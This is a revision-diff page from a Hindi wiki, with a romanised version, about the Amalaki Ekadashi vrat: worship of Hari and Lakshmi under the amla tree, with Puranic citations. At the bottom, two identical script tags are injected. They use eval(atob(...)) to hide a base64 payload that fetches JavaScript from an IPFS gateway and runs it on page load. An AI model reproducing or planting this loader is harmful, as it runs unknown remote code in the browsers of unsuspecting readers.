Difference between revisions of "आमलक्य एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[फाल्गुन]] [[शुक्ल पक्ष]] की [[एकादशी]] पर आमलक्येकादशी व्रत किया जाता है।
 
*[[फाल्गुन]] [[शुक्ल पक्ष]] की [[एकादशी]] पर आमलक्येकादशी व्रत किया जाता है।
*आमलक वृक्ष (जिसमें [[हरि]] एवं [[लक्ष्मी]] जी का वास होता है) के नीचे हरि की पूजा की जाती है। [[पद्म पुराण]] (6|47|33);  
+
*आमलक वृक्ष (जिसमें [[हरि]] एवं [[लक्ष्मी]] जी का वास होता है) के नीचे हरि की पूजा की जाती है।<ref>[[पद्म पुराण]] (6|47|33);</ref>
*हेमाद्रि व्रतखण्ड <ref>(हेमाद्रि व्रतखण्ड 1, 1155-1156); स्मृतिकौस्तुभ ( स्मृतिकौस्तुभ 516)</ref> में आमलकी वृक्ष के नीचे [[दामोदर]] एवं [[राधा]] की पूजा का वर्णन है।  
+
*हेमाद्रि व्रतखण्ड<ref>(हेमाद्रि व्रतखण्ड 1, 1155-1156); स्मृतिकौस्तुभ ( स्मृतिकौस्तुभ 516)</ref> में आमलकी वृक्ष के नीचे [[दामोदर]] एवं [[राधा]] की पूजा का वर्णन है।  
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1

Revision as of 10:33, 18 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • phalgun shukl paksh ki ekadashi par amalakyekadashi vrat kiya jata hai.
  • amalak vriksh (jisamean hari evan lakshmi ji ka vas hota hai) ke niche hari ki pooja ki jati hai.[1]
  • hemadri vratakhand[2] mean amalaki vriksh ke niche damodar evan radha ki pooja ka varnan hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. padm puran (6|47|33);
  2. (hemadri vratakhand 1, 1155-1156); smritikaustubh ( smritikaustubh 516)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>